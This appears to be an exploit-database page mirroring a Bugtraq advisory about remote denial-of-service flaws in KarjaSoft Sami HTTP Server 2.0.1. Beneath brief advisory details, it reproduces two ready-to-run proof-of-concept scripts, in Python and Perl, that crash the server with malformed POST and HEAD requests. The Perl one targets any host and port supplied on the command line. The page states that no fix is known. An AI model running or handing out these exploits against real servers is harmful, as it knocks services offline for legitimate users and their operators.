|
Feeds -
Exploits
|
|
Written by shinnai
|
|
Monday, 30 March 2009 22:08 |
KarjaSoft Sami HTTP Server Request Remote Denial of Service Vulnerabilities
-\\Bugtraq ID:
23445
-\\Class:
Failure to Handle Exceptional Conditions
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Apr 12 2007 12:00AM
-\\Updated:
Mar 30 2009 04:26PM
-\\Credit:
shinnai is credited with the discovery of these vulnerabilities.
-\\Vulnerable:
KarjaSoft Sami HTTP Server 2.0.1
-\\Discussion
Sami HTTP Server is prone to multiple remote denial-of-service vulnerabilities because
the software fails to handle exceptional conditions.
Exploiting these issues allows remote attackers to crash the server application,
denying further service to legitimate users.
This issue affects Sami HTTP Server 2.0.1; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following exploit codes are available:
===============================================================
23445.py
^^^^^^^^^
# usr/bin/python
import socket
print "-------------------------------------------------------------------------"
print " Sami HTTP Server 2.0.1 POST request Denial of Service"
print " url: http://www.karjasoft.com"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org"
print " Sending to the webserver a 'POST /%' will cause an abnormal termination"
print " of the program that requires the reboot of the webserver."
print "-------------------------------------------------------------------------"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = s.connect(("127.0.0.1",80))
s.send("POST /% HTTP/1.0 \n\n")
except:
print "Unable to connect. exiting."
===============================================================
23445.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Sami HTTP Server v2.x Remote Denial of Service with (HEAD) request.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in handling the HEAD
# command. This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Sami HTTP Server v2.x Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port")
|| die "[-]Connexion FAILED!\n";
print $socket "HEAD /\x25 HTTP/1.0\r\n";
close($socket);
print "[+]Done!\n";
-\\Solution
Currently we are not aware of any solutions for these issues. If you feel we are in error
or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Sami HTTP server Homepage
http://www.karja.com/samihttp/main.ph (KarjaSoft)
|
